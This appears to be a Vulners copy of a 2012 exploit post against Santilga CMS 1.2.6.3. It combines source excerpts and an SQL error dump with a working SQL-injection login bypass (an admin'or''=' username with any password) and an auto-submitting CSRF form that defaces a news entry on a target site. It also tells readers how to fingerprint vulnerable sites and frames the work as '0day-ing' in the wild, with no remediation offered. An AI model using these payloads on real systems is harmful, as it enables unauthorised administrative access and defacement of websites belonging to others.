Vulners
Lucene search
Santilga CMS 1.2.6.3 Cross Site Request Forgery / SQL Injection
=============================
Vulnerable software: Santilga CMS version 1.2.6.3
$ head -n 10 Admin.php|less
<?php
/**
* DO NOT EDIT THIS FILE! IT WILL BE OVERWRITTEN BY THE GENERATOR!
*
* @version 1.2.6.3 - generated: 2010-11-06 14:39:32
*/
class Admin_Bean_Base extends Santilga_Bean {
protected $_primaryKey = 'id';
Vendor: santilga.com
============================
Time to 0day it.
============================
Tested:
In Wild :P
OS: Windows Server Web Server Xamp edition.
And
Linux OS.
=============================
Vuln Desc
Under condition: GPC OFF
This cms is commercial and vulnerable to sql injection+CSRF:
Due insufficent sanitization of login when passing to mysql query we can trick it)
Also if you want to "fingerprint" and make sure is target site really uses santilga use this technique:
site.tld/admin/dashboard
Doing that you can simply may view administration section.
===================SNIP===========================
$ cat AdminLogin.php|less
<?php
class AdminLogin_Controller extends Santilga_Controller{
public function __construct() {
$this->view->templateName = "admin";
parent::__construct();
$this->lang = Santilga_Language::getInstance()->getLanguage();
$this->view->lang = $this->lang;
$this->view->showUploadForm = false;
}
public function indexAction(){
if($this->helpers->User->adminLoggedIn()){
$this->helpers->Url->redirect("admin/about");
}else{
$this->helpers->Url->redirect("adminLogin/login");
}
}
public function logoutAction(){
$session = Santilga_Resource::get("session");
if($session->adminLoggedIn){
unset($session->admin);
unset($session->adminId);
unset($session->adminLoggedIn);
}
$this->helpers->Url->redirect("adminLogin/login");
}
public function loginAction(){
$this->view->layoutFile = "loginLayout.php";
$request = $this->request->getParams();
$session = Santilga_Resource::get("session");
$model = Admin_Model::getInstance();
$error = array();
if($post = $this->request->getPost()){
/*$data = array('username' => $this->request->getPost('username'),
'password' => $this->request->getPost('password')
);*/
if(!empty($post["username"]) && !empty($post["password"])){
$admin = $model->autenticate($post);
if($admin !== null){
$session->admin = $admin;
$session->adminId = $admin->id;
$session->adminLoggedIn = true;
$this->helpers->Url->redirect("admin/about");
}else{
$error[] = Santilga_Language::_("userPassMismatch", "Error:: username and/or password didn't match or you are
not admin");
}
}else{
$error[] = Santilga_Language::_("userPassRequired", "Username and password must not be empty");
}
}
$this->view->error = $error;
$this->view->title = Santilga_Language::_("panelLogin", " Panel Login");
$this->view->mainContent = $this->view->content("form", "login");
$this->view->rightBlock = false;
}
}
?>
================================================================
If simply we will pass ' to login
We will get:
27.05.12 11:22:39- Uncaught Santilga_Database_Exception, code: 1064,Message:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9''
at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9'
#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] =>
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9''
at line 1,SQL:SELECT `admin`.* FROM admin WHERE username= ''' AND password= '3590cb8af0bbb9e78c343b52b93773c9' ,[] => ,[] => 1064,[]
Exploiting:
site.tld/admin/
Login: admin'or''='
Password: whateveryouwant
Logged in:)
CSRF:
==================================================================
<body onload="javascript:document.forms[0].submit()">
<form enctype="multipart/form-data" action="http://TARGET_SITE/admin/news/edit/id-33" method="post">
<input type="hidden" name="id" value="33" />
<input type="hidden" name="title" id="title" value="<h1>PwnEd</h1>" />
<textarea type="hidden" id="introtext" name="introtext" cols="0" rows="0" >
<h1>You Have Been PwnEd</h1>
</textarea>
<input type="hidden" id="ordering" name="ordering" value="1" size="3" maxlength="5" />
<select type="hidden" name="published">
<option value="1" selected="selected">Yes</option>
<option value="0" >No</option>
</select>
</form>
===================================================================
# 0day.today [2018-01-03] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 May 2012 00:00Current
7.1High risk
Vulners AI Score7.1